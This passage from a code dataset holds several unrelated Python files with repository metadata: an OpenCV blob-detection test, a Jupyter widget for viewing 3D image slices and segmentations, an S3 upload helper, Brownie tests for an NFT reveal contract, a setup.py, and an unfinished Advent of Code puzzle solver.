cv2.SimpleBlobDetector_create(params)\n\nwhile cap.isOpened():\n    ret, frame = cap.read()\n    if frame is None:\n        break\n\n    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n    frame = filterFrame(frame)\n\n    # frame = cv2.equalizeHist(frame)\n\n    keypoints = detector.detect(frame)\n\n\n\n    im_with_keypoints = cv2.drawKeypoints(frame, keypoints, np.array([]), (0, 0, 255),\n                                          cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n\n    for i in keypoints:\n        print(i.response)\n\n    cv2.imshow('frame', im_with_keypoints)\n\n    if cv2.waitKey(0) & 0xFF == ord('q'):\n        break\n\nelse:\n    cap.release()\n    cv2.destroyAllWindows()\n\ncap.release()\ncv2.destroyAllWindows()\nprint(\"Successfully Completed!\")\n","repo_name":"DinushkaDDS/Change-Detection-In-SAR-Videos","sub_path":"Filter Test/Final System Files/Test_Blob.py","file_name":"Test_Blob.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} {"seq_id":"22363536814","text":"import matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom ipywidgets import widgets\nimport numpy as np\nfrom slicevis.image import Image\nfrom slicevis.load import load_image\n\nis_debug = False  # global debug flag\n\n\nclass SliceWidget:\n    \"\"\"Widget class that offers interactive visualization 
of slices in 3D dataset\"\"\"\n\n def __init__(self, image3D, debug=False):\n \"\"\"Constructor for SliceWidget. Configures GUI layout and connects callbacks.\n\n Args:\n image3D (_type_): the 3D dataset\n debug (bool, optional): enable Debug output mode. Defaults to False.\n\n Raises:\n ValueError: if image3D has the wrong dimensions\n \"\"\"\n if image3D.ndim != 3:\n raise ValueError(\"input image must be 3D\")\n\n self.image3D = image3D # input image\n\n # initializing segmentations and classes\n self.seg3D = None\n self.seg2D = None\n self.seg3D_validation = None\n self.seg2D_validation = None\n self.class_names = {}\n self.class_names_validation = {}\n self.class_colors = {}\n\n # default slice\n self.curr_axis = 2 # z = const plane\n default_slice = int(image3D.shape[self.curr_axis] / 2) # axial slice\n self.image2D = image3D[:, :, default_slice] # current slice\n\n # slice buttons in horizontal layout\n self.b_axial = widgets.Button(description=\"Show axial\")\n self.b_coronal = widgets.Button(description=\"Show coronal\")\n self.b_sagittal = widgets.Button(description=\"Show sagittal\")\n self.b_layout = widgets.HBox(\n [self.b_axial, self.b_coronal, self.b_sagittal],\n )\n\n # rotation buttons in second row\n self.b_rot = widgets.Button(description=\"Rotate 90°\")\n self.b_flip_ud = widgets.Button(description=\"Flip upside down\")\n self.b_flip_lr = widgets.Button(description=\"Flip left to right\")\n self.util_layout = widgets.HBox([self.b_rot, self.b_flip_ud, self.b_flip_lr])\n\n # stack buttons\n self.b_layout_vertical = widgets.VBox(\n [self.b_layout, self.util_layout],\n layout=widgets.Layout(width=\"80%\", align_items=\"center\"),\n )\n\n # vertical slider (+ buttons and labels)\n max = self.image3D.shape[self.curr_axis] - 1\n self.slider = widgets.IntSlider(\n description=\"Z\",\n value=default_slice,\n min=0,\n max=max,\n step=1,\n orientation=\"vertical\",\n )\n self.b_up = widgets.Button(\n description=\"↑\", layout=widgets.Layout(width=\"50px\", font_weight=\"bold\")\n )\n self.b_down = widgets.Button(\n description=\"↓\", layout=widgets.Layout(width=\"50px\", font_weight=\"bold\")\n )\n self.min_label = widgets.Label(value=\"Min = 0\")\n self.max_label = widgets.Label(value=\"Max = \" + str(max))\n self.slider_layout = widgets.VBox(\n [self.max_label, self.b_up, self.slider, self.b_down, self.min_label],\n layout=widgets.Layout(align_items=\"center\"),\n )\n\n # figure setup\n self.color = \"gray\"\n xlabel = \"Y\"\n ylabel = \"X\"\n\n # using plotly express imshow for interactive display\n self.fig = px.imshow(\n self.image2D,\n color_continuous_scale=self.color,\n labels={\"x\": xlabel, \"y\": ylabel, \"color\": \"Value\"},\n width=800,\n height=600,\n )\n self.widget = go.FigureWidget(data=self.fig) # dynamic figure widget\n self.widget_box = widgets.Box([self.widget])\n\n # load buttons\n self.b_load_seg = widgets.Button(description=\"Load\")\n self.b_clear_seg = widgets.Button(description=\"Clear\")\n self.segmentation_path = widgets.Text(\n placeholder=\"Segmentation file\",\n layout=widgets.Layout(width=\"90%\"),\n )\n self.load_seg_box = widgets.VBox(\n [\n self.segmentation_path,\n widgets.HBox(\n [self.b_load_seg, self.b_clear_seg],\n layout=widgets.Layout(width=\"95%\"),\n ),\n ],\n layout=widgets.Layout(width=\"20%\", align_items=\"center\"),\n )\n\n # load validation segmentation\n self.b_load_valid = widgets.Button(description=\"Load\")\n self.b_clear_valid = widgets.Button(description=\"Clear\")\n self.validation_path = widgets.Text(\n 
placeholder=\"Validation file\",\n layout=widgets.Layout(width=\"90%\"),\n )\n self.load_valid_box = widgets.VBox(\n [\n self.validation_path,\n widgets.HBox(\n [self.b_load_valid, self.b_clear_valid],\n layout=widgets.Layout(width=\"95%\"),\n ),\n ],\n layout=widgets.Layout(width=\"20%\", align_items=\"center\"),\n )\n\n self.b_layout_horizontal = widgets.HBox(\n [\n self.load_seg_box,\n self.load_valid_box,\n self.b_layout_vertical,\n ],\n layout=widgets.Layout(\n justify_content=\"space-around\", align_items=\"center\", width=\"85%\"\n ),\n )\n\n # optional debug output\n self.out = widgets.Output()\n self.b_clear = widgets.Button(description=\"Clear\")\n\n # app layout\n self.slice_layout = widgets.HBox(\n [self.slider_layout, self.widget_box],\n layout=widgets.Layout(align_items=\"center\"),\n )\n\n global is_debug\n is_debug = debug\n if is_debug:\n self.app = widgets.VBox(\n [\n self.b_layout_horizontal,\n self.slice_layout,\n widgets.VBox([self.b_clear, self.out]),\n ]\n )\n else:\n self.app = widgets.VBox([self.b_layout_horizontal, self.slice_layout])\n self.app.layout.justify_content = (\n \"flex-start\" # main axis = vertical (no effect)\n )\n self.app.layout.align_items = \"center\" # cross axis = horizontal\n self.app.layout.border = \"2px solid gray\"\n\n # connect buttons to callbacks\n self.b_axial.on_click(self._show_axial)\n self.b_axial.on_click(self._axis_changed)\n self.b_coronal.on_click(self._show_coronal)\n self.b_coronal.on_click(self._axis_changed)\n self.b_sagittal.on_click(self._show_sagittal)\n self.b_sagittal.on_click(self._axis_changed)\n self.b_rot.on_click(self._rotate_view)\n self.b_flip_ud.on_click(self._flip_up)\n self.b_flip_lr.on_click(self._flip_lr)\n\n self.b_load_seg.on_click(self._load_segmentation)\n self.b_clear_seg.on_click(self._clear_segmentation)\n self.b_load_valid.on_click(self._load_validation_segmentation)\n self.b_clear_valid.on_click(self._clear_validation)\n\n self.slider.observe(self._slice_changed, names=\"value\")\n self.b_up.on_click(self._up_pressed)\n self.b_down.on_click(self._down_pressed)\n\n # show layout borders in debug mode\n if is_debug:\n self.b_clear.on_click(self._clear_output)\n self.b_layout_vertical.layout.border = \"1px solid black\"\n self.b_layout_horizontal.layout.border = \"1px solid black\"\n self.slice_layout.layout.border = \"1px solid black\"\n self.slider_layout.layout.border = \"1px solid black\"\n self.widget_box.layout.border = \"1px solid black\"\n self.load_seg_box.layout.border = \"1px solid black\"\n\n display(self.app) # show app\n\n def _show_axial(self, b):\n \"\"\"Shows X,Y-plane in figure.\n\n Args:\n b (bool): required for on_click callback\n \"\"\"\n\n self.curr_axis = 2 # z = const\n default_slice = int(self.image3D.shape[self.curr_axis] / 2) # default z index\n self.slider.value = default_slice # calls _update2D\n\n xlabel = \"Y\"\n ylabel = \"X\"\n\n self.widget.update_layout(\n xaxis=dict(title_text=xlabel, range=[0, self.image3D.shape[1]]),\n yaxis=dict(title_text=ylabel, range=[self.image3D.shape[0], 0]),\n )\n\n self._debug(\"Show axial.\")\n\n def _show_coronal(self, b):\n \"\"\"Shows X,Z-plane in figure.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n\n self.curr_axis = 1 # y = const\n default_slice = int(self.image3D.shape[self.curr_axis] / 2) # default y index\n self.slider.value = default_slice # calls _update2D\n\n xlabel = \"Z\"\n ylabel = \"X\"\n\n self.widget.update_layout(\n xaxis=dict(title_text=xlabel, range=[0, self.image3D.shape[2]]),\n 
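# the y-range is reversed so the image origin stays in the top-left corner\n            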
yaxis=dict(title_text=ylabel, range=[self.image3D.shape[0], 0]),\n )\n\n self._debug(\"Show coronal.\")\n\n def _show_sagittal(self, b):\n \"\"\"Shows Y,Z-plane in figure.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n self.curr_axis = 0 # x = const\n default_slice = int(self.image3D.shape[self.curr_axis] / 2) # default x index\n self.slider.value = default_slice # calls _update2D\n\n xlabel = \"Z\"\n ylabel = \"Y\"\n\n self.widget.update_layout(\n xaxis=dict(title_text=xlabel, range=[0, self.image3D.shape[2]]),\n yaxis=dict(title_text=ylabel, range=[self.image3D.shape[1], 0]),\n )\n\n self._debug(\"Show sagittal.\")\n\n def _axis_changed(self, change):\n \"\"\"Update slider range and labels based on current axis.\n\n Args:\n change (dict): required for on_click callback\n \"\"\"\n max = self.image3D.shape[self.curr_axis] - 1\n self.slider.max = max\n self.max_label.value = \"Max = \" + str(max)\n\n if self.curr_axis == 0:\n self.slider.description = \"X\"\n elif self.curr_axis == 1:\n self.slider.description = \"Y\"\n else:\n self.slider.description = \"Z\"\n\n self._debug(\"Axis changed.\")\n\n def _rotate_view(self, b):\n \"\"\"Rotates the 3D dataset by 90 degrees in the current plane.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n rot_axes = self._get_rot_axes()\n self.image3D = np.rot90(\n self.image3D, axes=rot_axes\n ) # rotated \"view\" on ndarray\n if self.seg3D is not None:\n self.seg3D = np.rot90(self.seg3D, axes=rot_axes)\n self._update2D(None) # index unchanged\n\n def _flip_up(self, b):\n \"\"\"Flips the 3D dataset upside down in the current plane.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n flip_axis = self._get_rot_axes()[0]\n self.image3D = np.flip(self.image3D, axis=flip_axis)\n if self.seg3D is not None:\n self.seg3D = np.flip(self.seg3D, axis=flip_axis)\n self._update2D(None)\n\n def _flip_lr(self, b):\n \"\"\"Flips the 3D dataset left to right in the current plane.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n flip_axis = self._get_rot_axes()[1]\n self.image3D = np.flip(self.image3D, axis=flip_axis)\n if self.seg3D is not None:\n self.seg3D = np.flip(self.seg3D, axis=flip_axis)\n self._update2D(None)\n\n def _slice_changed(self, change):\n \"\"\"Callback that triggers if the slider changed its value.\n\n Args:\n b (dict): the new value is retrieved as b.new\n \"\"\"\n\n self._update2D(change.new)\n\n def _clear_output(self, b):\n \"\"\"Clears the debug output.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n self.out.clear_output()\n\n def _update2D(self, index):\n \"\"\"Method to update 2D view.\n\n Args:\n index (int): the new slice index\n \"\"\"\n if index is None: # index unchanged\n index = self.slider.value\n\n # update image2D and segmentations according to axis and index\n if self.curr_axis == 0:\n self.image2D = self.image3D[index, :, :]\n if self.seg3D is not None:\n self.seg2D = self.seg3D[index, :, :]\n if self.seg3D_validation is not None:\n self.seg2D_validation = self.seg3D_validation[index, :, :]\n elif self.curr_axis == 1:\n self.image2D = self.image3D[:, index, :]\n if self.seg3D is not None:\n self.seg2D = self.seg3D[:, index, :]\n if self.seg3D_validation is not None:\n self.seg2D_validation = self.seg3D_validation[:, index, :]\n else:\n self.image2D = self.image3D[:, :, index]\n if self.seg3D is not None:\n self.seg2D = self.seg3D[:, :, index]\n if self.seg3D_validation is not None:\n self.seg2D_validation = self.seg3D_validation[:, :, index]\n\n # generate 
segmentations (optional)\n trace_list = []\n\n if self.seg3D_validation is not None: # validation segmentation first\n for c in self.class_names_validation.values():\n if c == 0: # unclassified\n continue\n c_indices = np.nonzero(self.seg2D_validation == c) # tuple of arrays\n class_name = list(self.class_names.keys())[\n list(self.class_names.values()).index(c)\n ]\n color = self.class_colors[class_name]\n if len(self.class_names_validation) == 2: # white if only one class\n color = \"rgb(255,255,255)\"\n class_name = list(self.class_names_validation.keys())[\n list(self.class_names_validation.values()).index(c)\n ]\n trace_list.append(\n go.Scatter(\n y=c_indices[0],\n x=c_indices[1],\n opacity=0.3,\n mode=\"markers\",\n marker_color=color,\n marker_symbol=\"square\",\n showlegend=True,\n name=class_name,\n )\n )\n\n # segmentation \"overlay\"\n if self.seg3D is not None:\n for c in self.class_names.values():\n if c == 0: # unclassified\n continue\n c_indices = np.nonzero(self.seg2D == c) # tuple of arrays\n class_name = list(self.class_names.keys())[\n list(self.class_names.values()).index(c)\n ]\n trace_list.append(\n go.Scatter(\n y=c_indices[0],\n x=c_indices[1],\n opacity=0.5,\n mode=\"markers\",\n marker_symbol=\"square\",\n marker_color=self.class_colors[class_name],\n showlegend=True,\n name=class_name,\n )\n )\n\n # batch update\n with self.widget.batch_update():\n self.widget.data[0][\"z\"] = self.image2D\n self.widget.data = [self.widget.data[0]] # clear segmentations\n self.widget.add_traces(trace_list)\n self.widget.update_layout(\n legend=dict(x=0, y=1, orientation=\"h\", yanchor=\"bottom\", xanchor=\"left\")\n )\n self._debug(\"update.\")\n\n def _up_pressed(self, b):\n \"\"\"Increments slider by one.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n new_value = self.slider.value + 1\n self.slider.value = new_value\n\n def _down_pressed(self, b):\n \"\"\"Decrements slider by one.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n new_value = self.slider.value - 1\n self.slider.value = new_value\n\n def _load_segmentation(self, b, is_validation=False):\n \"\"\"Loads a segmentation file with class names and colors.\n\n Args:\n b (dict): required for on_click callback\n is_validation (bool, optional): Flag for validation segmentation. 
Defaults to False.\n\n        Raises:\n            ValueError: If the segmentation shape (dimension) does not match the image.\n            FileNotFoundError: If the filename is invalid.\n        \"\"\"\n        # read filename from text entry field\n        file = None\n        if is_validation:\n            file = self.validation_path.value\n        else:\n            file = self.segmentation_path.value\n\n        if file:  # not empty\n            try:\n                seg_image = load_image(file, is_segmentation=True)\n\n                if is_validation:\n                    self.seg3D_validation = seg_image.get_timepoint(0)\n                else:\n                    self.seg3D = seg_image.get_timepoint(0)  # 3D\n\n                # check shape of segmentation\n                if is_validation:\n                    if self.seg3D_validation.shape != self.image3D.shape:\n                        raise ValueError(\"Validation segmentation shape mismatch.\")\n                else:\n                    if self.seg3D.shape != self.image3D.shape:\n                        raise ValueError(\"Segmentation shape mismatch.\")\n\n                # rename validation segmentation class names\n                if is_validation:\n                    self.class_names_validation = seg_image.get_class_names()\n                    tmp = {}\n                    for i in self.class_names_validation.keys():\n                        tmp[i + \"_v\"] = self.class_names_validation[i]\n                    self.class_names_validation = tmp\n                    self.class_colors = seg_image.get_class_colors()\n                else:\n                    self.class_names = seg_image.get_class_names()\n\n                self.class_colors = seg_image.get_class_colors()  # \"rgb(a,b,c)\"\n\n                self._update2D(index=None)  # sets seg2D and paints it\n            except FileNotFoundError:\n                print(\"Segmentation file name invalid.\")\n            except ValueError as valErr:\n                print(\"Error: \" + str(valErr))\n\n    def _load_validation_segmentation(self, b):\n        \"\"\"Loads a validation segmentation.\n\n        Args:\n            b (dict): required for on_click callback\n        \"\"\"\n        self._load_segmentation(b, True)\n        self._compute_dice_score()\n\n    def _compute_dice_score(self):\n        \"\"\"Computes the Sorensen-Dice similarity coefficient between the segmentation and validation segmentation.\"\"\"\n\n        if self.seg3D is not None and self.seg3D_validation is not None:\n            for i in self.class_names:\n                index = self.class_names[i]\n                if index == 0:  # unclassified\n                    continue\n                X_i = self.seg3D[self.seg3D == index]\n                X = len(X_i)  # number of voxels in class i\n                Y_i = self.seg3D_validation[self.seg3D_validation == index]\n                Y = len(Y_i)\n\n                # intersection of segmentation and validation for class i\n                intersection = np.sum(\n                    np.where(\n                        (self.seg3D == index)\n                        & (self.seg3D_validation == index)\n                        & (self.seg3D != 0),\n                        1,\n                        0,\n                    )\n                )\n                Dice = 2 * intersection / (X + Y)\n\n                print(\"Dice score for class \" + i + \": \" + str(Dice) + \"\\n\")\n\n    def _debug(self, string):\n        \"\"\"Prints a string to the debug output (if enabled).\n\n        Args:\n            string (str): the string to be printed\n        \"\"\"\n        global is_debug\n        if is_debug:\n            self.out.append_stdout(string + \"\\n\")\n\n    def _get_rot_axes(self):\n        \"\"\"Returns the two axes of the current slice.\n\n        Returns:\n            list: the two axes\n        \"\"\"\n        if self.curr_axis == 0:\n            return [1, 2]\n        elif self.curr_axis == 1:\n            return [0, 2]\n        else:\n            return [0, 1]\n\n    def _clear_segmentation(self, b):\n        \"\"\"Clears the current segmentation.\n\n        Args:\n            b (dict): required for on_click callback\n        \"\"\"\n        if self.seg3D is not None:\n            self.seg3D = None\n            self.seg2D = None\n            self._update2D(None)\n\n    def _clear_validation(self, b):\n        \"\"\"Clears the current validation segmentation.\n\n        Args:\n            b (dict): required for on_click callback\n        \"\"\"\n        if self.seg3D_validation is not None:\n            self.seg3D_validation = None\n            self.seg2D_validation = None\n            self._update2D(None)\n\n    # --- public methods --- #\n
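\n    # thin convenience wrappers that forward to the underlying Plotly FigureWidget API\n\n    def 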
set_figure_size(self, width, height):\n \"\"\"Set size of figure.\n\n Args:\n width (int): width of figure in pixels\n height (int): height of figure in pixels\n \"\"\"\n self.widget.layout.width = width\n self.widget.layout.height = height\n\n def set_colormap(self, cmap):\n \"\"\"Set the figure's colormap.\n\n Args:\n cmap (str): Name of Plotly colorscale. See https://plotly.com/python/builtin-colorscales/\n \"\"\"\n self.widget.update_coloraxes(\n cmin=np.min(self.image3D),\n cmax=np.max(self.image3D),\n colorscale=cmap,\n title=\"Class\",\n )\n\n self._debug(\n \"cmin=\" + str(np.min(self.image3D)) + \", cmax=\" + str(np.max(self.image3D))\n )\n\n def add_class_names(self, names, indices):\n \"\"\"Sets class indices as colorbar ticks and class names as tick labels.\n\n Args:\n names (list): list of name strings\n indices (list): list of class integer indices\n \"\"\"\n self.widget.update_coloraxes(\n colorbar_tickmode=\"array\",\n colorbar_tickvals=indices,\n colorbar_ticktext=names,\n )\n","repo_name":"nicholasbook/slicevis","sub_path":"slicevis/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":22251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41380819914","text":"import boto3\n\n\ndef upload_to_aws(local_file, bucket, s3_file):\n s3 = boto3.client('s3')\n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(\"Upload Successful\")\n return True\n except FileNotFoundError:\n print(\"The file was not found\")\n return False\n\n\nuploaded = upload_to_aws(\n '../example.parquet', 'convex-bucket1', 'example.parquet'\n)\n","repo_name":"Seraph2000/convex_tech_test","sub_path":".aws/upload_file_to_s3.py","file_name":"upload_file_to_s3.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74118867341","text":"import brownie\nfrom brownie import accounts, config, RevealERC721, network\nfrom scripts.helpers.contracts import get_contract, fund_with_link\n\n\ndef get_tokens_ids(ct):\n totalSupply = ct.totalSupply()\n return [int(ct.tokenURI(token_id+1).split(\"/\")[-1].split(\".json\")[0]) for token_id in range(totalSupply)]\n\n\ndef get_tokens_uri(ct):\n totalSupply = ct.totalSupply()\n return [ct.tokenURI(token_id+1) for token_id in range(totalSupply)]\n\n\ndef test_normal_workflow():\n account0 = accounts.add(config[\"wallets\"][\"from_key\"])\n collectionName: str = \"Collection\"\n baseURI: str = \"ipfs://12345/\"\n vrfCoordinator = get_contract(\"VRFCoordinator\", account0)\n link = get_contract(\"LinkToken\", account0)\n linkFee = config[\"networks\"][network.show_active()][\"fee\"]\n linkKeyhash = config[\"networks\"][network.show_active()][\"keyhash\"]\n\n ct = RevealERC721.deploy(\n collectionName, baseURI, vrfCoordinator.address, link.address, linkFee, linkKeyhash,\n {\"from\": account0},\n publish_source=False\n )\n\n # Initial values\n assert ct.name() == collectionName\n assert ct.balance() == 0\n assert ct.balanceOf(account0.address) == 0\n assert ct.paused() is False\n assert ct.owner() == account0.address\n assert ct.totalSupply() == 0\n assert ct.contractState() == 0\n\n with brownie.reverts(\"ERC721Metadata: URI query for nonexistent token\"):\n ct.tokenURI(1)\n\n # Owner Minting\n amount = 50\n ct.mint(account0.address, amount, {\"from\": account0})\n assert ct.totalSupply() == amount\n assert ct.balanceOf(account0.address) == amount\n ids = get_tokens_ids(ct)\n assert ids == 
list(range(1,51))\n\n # Not owner minting\n with brownie.reverts(\"Ownable: caller is not the owner\"):\n ct.mint(accounts[1].address, 1, {\"from\": accounts[1]})\n\n # No reveal URIs\n uris = get_tokens_uri(ct)\n assert [baseURI+\"noreveal/\"+str(id)+\".json\" for id in ids] == uris\n\n # Not owner reveal\n with brownie.reverts(\"Ownable: caller is not the owner\"):\n ct.revealTokens({\"from\": accounts[1]})\n\n # Reveal before random number\n with brownie.reverts(\"Wrong contract state\"):\n ct.revealTokens({\"from\": account0})\n\n # Get random number without enough LINK\n with brownie.reverts(\"Not enough LINK\"):\n ct.getRandomNumber({\"from\": account0})\n\n # Found the contract and get the random number\n tx = fund_with_link(ct.address, account0, link, linkFee)\n tx.wait(1)\n tx = ct.getRandomNumber({\"from\": account0})\n tx.wait(1)\n assert ct.contractState() == 2\n\n # Run the vrfCoordinator mock, only for local tests\n request_id = tx.events[\"RequestedRandomness\"][\"requestID\"]\n rand = 57960407935404775673433170853203864526063280851215043454225382818284790976260\n tx = vrfCoordinator.callBackWithRandomness(request_id, rand, ct.address, {\"from\": account0})\n assert ct.randomResult() != 0\n\n # Reveal the tokens\n ct.revealTokens({\"from\": account0})\n assert ct.balanceOf(account0.address) == amount\n \n # Try to reveal twice\n with brownie.reverts(\"Wrong contract state\"):\n ct.revealTokens({\"from\": account0})\n\n # We don't allow minting after reveal\n with brownie.reverts(\"Tokens can only be minted before reveal\"):\n ct.mint(account0.address, 1, {\"from\": account0})\n\n # Check shuffled ids\n idsShuffled = get_tokens_ids(ct)\n assert idsShuffled != ids\n assert sorted(idsShuffled) == sorted(ids)\n\n # Check reveal uris\n uris = get_tokens_uri(ct)\n assert [baseURI+\"reveal/\"+str(id)+\".json\" for id in idsShuffled] == uris\n\n # Check nft transfer\n ct.transferFrom(account0.address, accounts[1].address, 1, {'from': account0})\n ct.transferFrom(accounts[1].address, accounts[2].address, 1, {'from': accounts[1]})\n ct.transferFrom(account0.address, accounts[2].address, 2, {'from': account0})\n assert ct.balanceOf(account0.address) == amount-2\n assert ct.balanceOf(accounts[1].address) == 0\n assert ct.balanceOf(accounts[2].address) == 2\n\n # Try to transfer a token that the account is not the owner\n with brownie.reverts(\"ERC721: transfer caller is not owner nor approved\"):\n ct.transferFrom(accounts[1].address, accounts[2].address, 1, {'from': accounts[1]})\n\n # Contract owner try to transfer a token from another owner\n with brownie.reverts(\"ERC721: transfer caller is not owner nor approved\"):\n ct.transferFrom(accounts[2].address, accounts[3].address, 1, {'from': account0})\n\n # Allow an account to transfer tokens\n approved = ct.isApprovedForAll(accounts[2].address, account0.address)\n assert approved == False\n ct.setApprovalForAll(account0.address, True, {'from': accounts[2]})\n approved = ct.isApprovedForAll(accounts[2].address, account0.address)\n assert approved == True\n ct.transferFrom(accounts[2].address, accounts[4].address, 1, {'from': account0})\n\n # Test revoke permission\n ct.setApprovalForAll(account0.address, False, {'from': accounts[2]})\n with brownie.reverts(\"ERC721: transfer caller is not owner nor approved\"):\n ct.transferFrom(accounts[2].address, accounts[4].address, 2, {'from': account0})\n\n # Test interfaces\n supported_interface_ids = {\n \"ERC721\": 0x80ac58cd, # Non-Fungible Token Standard\n \"ERC721Metadata\": 0x5b5e139f, # 
Non-Fungible Token Standard, optional metadata extension\n \"IERC2981\": 0x2a55205a, # NFT Royalty Standard\n \"EIP165\": 0x01ffc9a7, # Standard Interface Detection\n }\n for interface, id in supported_interface_ids.items():\n assert ct.supportsInterface(id) == True, \"supportsInterface: \"+interface\n\n # Test royalt\n sale_price = 100000\n assert ct.royaltyInfo(1, sale_price) == (account0.address, sale_price*0)\n with brownie.reverts(\"Ownable: caller is not the owner\"):\n ct.setRoyalty(200, {\"from\": accounts[1]})\n ct.setRoyalty(200, {'from': account0})\n assert ct.royaltyInfo(1, sale_price) == (account0.address, sale_price*0.02)","repo_name":"filipecaixeta/reveal-erc721","sub_path":"tests/test_contract.py","file_name":"test_contract.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42673206203","text":"import setuptools\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\nsetuptools.setup(\n name='playwithML',\n version='0.2',\n scripts=['playwithml.py'],\n author=\"Akash C\",\n author_email=\"akashincrp@gmail.com\",\n description=\"A AutoML type utility\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mystery2828/playwithml\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n )","repo_name":"mystery2828/playwithML","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"73117749582","text":"import re\nimport itertools\nimport numpy as np\nimport time\n\ninstructions = open(\"2016/day11.txt\").read().splitlines()\n\nclass Floor():\n def __init__(self, floor_number, microchips = [], generators = []):\n self.floor_number = floor_number\n self.microchips = microchips\n self.generators = generators\n \n def load(self, thing):\n if type(thing) == Microchip:\n self.microchips.append(thing)\n if type(thing) == Generator:\n self.generators.append(thing)\n \n def unload(self, thing):\n if type(thing) == Microchip:\n self.microchips.remove(thing)\n if type(thing) == Generator:\n self.generators.remove(thing)\n \n def amount(self):\n return len(self.microchips) + len(self.generators)\n \n def danger_check(self):\n temp_chips = self.microchips.copy()\n temp_gens = self.generators.copy()\n okay_items = []\n for chip in temp_chips:\n for gen in temp_gens:\n if chip.get_element() == gen.get_element(): #If there is a matching pair, remove it\n print(f\"Pair! 
{chip} {gen}\")\n                    okay_items.append(chip)\n                    okay_items.append(gen)\n        for item in okay_items:\n            if type(item) == Generator:\n                temp_gens.remove(item)\n            else:\n                temp_chips.remove(item)\n        if len(temp_chips) >= 1 and len(temp_gens) >= 1:\n            return True\n        return False\n\nclass Elevator():\n    def __init__(self, contents=[], floor=1):\n        self.contents = contents\n        self.floor = floor\n    \n    def load(self, thing):\n        floors_list[self.floor - 1].unload(thing)\n        self.contents.append(thing)\n    \n    def unload(self, thing):\n        floors_list[self.floor - 1].load(thing)\n        self.contents.remove(thing)\n    \n    def danger_check(self): #Returns True if the items in the elevator interfere with each other, False if there is no danger\n        generator_list = []\n        microchip_list = []\n        for item in self.contents:\n            if type(item) == Generator:\n                generator_list.append(item)\n            elif type(item) == Microchip:\n                microchip_list.append(item)\n        \n        #If there is just one microchip and just one generator, they must be the same element\n        #otherwise, two microchips and two generators are just fine\n        if len(generator_list) == 1 and len(microchip_list) == 1:\n            if generator_list[0].get_element() != microchip_list[0].get_element():\n                print(\"Danger! Elevator contains competing items\")\n                return True\n        return False\n    \n    def move_floor(self, up_or_down):\n        if self.contents == []:\n            print(\"elevator can't move! Needs something inside\")\n            return\n        elif len(self.contents) > 2:\n            print(\"too many items in elevator!\")\n            return\n        if self.danger_check():\n            print(\"can't move floors! Danger in elevator!\")\n\n        elif up_or_down == \"up\":\n            self.floor += 1\n        elif up_or_down == \"down\":\n            self.floor -= 1\n\nclass Generator():\n    def __init__(self, element):\n        self.element = element\n    \n    def __repr__(self):\n        return self.element + \" \" + type(self).__name__\n    \n    def get_element(self):\n        return self.element\n\nclass Microchip(Generator):\n    pass\n\nh_gen = Generator(\"Hydrogen\")\nh_mic = Microchip(\"Hydrogen\")\nl_gen = Generator(\"Lithium\")\nl_mic = Microchip(\"Lithium\")\n\nfloors_list = [Floor(1, microchips=[h_mic, l_mic]),Floor(2, generators=[h_gen]),Floor(3, generators=[l_gen]),Floor(4)]\n\n#floor5 = Floor(5, generators=[Generator(\"A\"), Generator(\"C\"), Generator(\"B\")], microchips=[Microchip(\"B\"), Microchip(\"A\"), Microchip(\"D\")])\n#print(floor5.danger_check())\n\nelevator = Elevator()\n\nstep_count = 0\n#while floors_list[3].amount() != 4: (while floor four doesn't have every item) \nfor i in range(5):\n    current_floor_num = elevator.floor\n    floor = floors_list[current_floor_num - 1]\n    if len(elevator.contents) < 2: \n        #for every chip, if its generator is on another floor\n        for chip in floor.microchips:\n            for other_floor in floors_list:\n                if other_floor.floor_number > floor.floor_number and chip.element in [gen.element for gen in other_floor.generators] and len(elevator.contents) < 2:\n                    print(f\"floor {other_floor.floor_number} has the generator to {chip}\")\n                    elevator.load(chip)\n        for gen in floor.generators:\n            for other_floor in floors_list:\n                if other_floor.floor_number > floor.floor_number and gen.element in [chip.element for chip in other_floor.microchips] and len(elevator.contents) < 2:\n                    #print(f\"floor {other_floor.floor_number} has the microchip to {gen}\")\n                    elevator.load(gen)\n\n\n\n#RULES\n#Generator and Microchip of two different elements can't be on the same floor (or elevator ride) unless the microchip is attached to its generator\n#Elevator can only carry two items, must carry at least one to move\n#get everything to floor four\n\n#While all generators and microchips 
